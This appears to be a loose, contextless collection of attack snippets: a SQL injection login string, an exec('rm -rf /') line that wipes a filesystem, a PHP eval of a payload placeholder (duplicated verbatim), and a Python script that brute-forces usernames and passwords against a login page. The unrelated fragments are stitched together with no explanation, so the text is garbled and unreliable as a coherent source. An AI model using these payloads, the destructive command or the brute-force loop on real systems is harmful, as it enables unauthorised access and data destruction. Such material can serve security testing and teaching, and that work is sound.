username=admin' OR '1'='1'; -- 
password=secret




exec('rm -rf /');  # Dangerous command to delete files
system('ls -la');  # Command to list files



<?php
$payload = "exec('malicious_code_here')";
eval($payload);  // This executes the code contained in $payload
?>



<?php
$payload = "exec('malicious_code_here')";
eval($payload);  // This executes the code contained in $payload
?>



import requests

url = "http://example.com/login"
usernames = ["admin", "user"]
passwords = ["password", "123456", "secret"]

for username in usernames:
    for password in passwords:
        response = requests.post(url, data={'username': username, 'password': password})
        if "Login successful" in response.text:
            print(f"Found credentials: {username}:{password}")
